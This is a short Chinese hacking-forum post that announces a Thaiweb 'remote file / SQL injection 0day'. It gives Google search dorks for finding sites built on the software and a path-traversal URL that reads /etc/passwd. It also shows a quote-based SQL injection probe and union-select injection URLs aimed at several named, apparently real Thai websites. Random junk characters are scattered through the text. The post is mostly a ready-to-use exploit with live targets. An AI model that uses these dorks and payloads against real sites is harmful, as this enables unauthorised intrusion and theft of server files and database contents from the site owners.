找回密码
 立即注册
查看: 2793|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:
0 F5 f) R9 b# ?8 [5 u0 b" e. B( n, ^. c* g
intext:powered by Thaiweb
2 W. y1 z; |9 k/ B: c* ]+ i
; Q! @7 ^, k+ |inurl:index.php?page=board.php$ j* @" X% i/ K% C7 K! X, E
- ^0 \3 B, \$ Q9 I# b
- p! ]% r6 f0 g$ U

1 l! K! ~7 [) A# Q; o) Q利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
4 w* u! G; k5 V  y
/ [4 A/ [8 q5 |$ D+ Q9 V
# |' y# i5 X3 z+ N) R/ ^3 v5 a5 o  l9 Z1 \
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
6 q+ F2 w  r& E6 Q' J- i, x5 e1 x0 \9 w* f" ]: P! C

2 q5 f% d5 E, X9 ?; D9 T
! F2 |/ W- K( |$ F5 B: x! V; Ahttp://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--0 h% |  D7 P3 ^% ^
! u+ d$ V7 O! Q( F7 l2 t
http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--4 ^/ N7 ]2 l" f& z( O% b

6 D' V# o  F# U! X: C+ E) Ahttp://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--" I2 ~. Z/ u, {9 d5 a. l5 ]
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表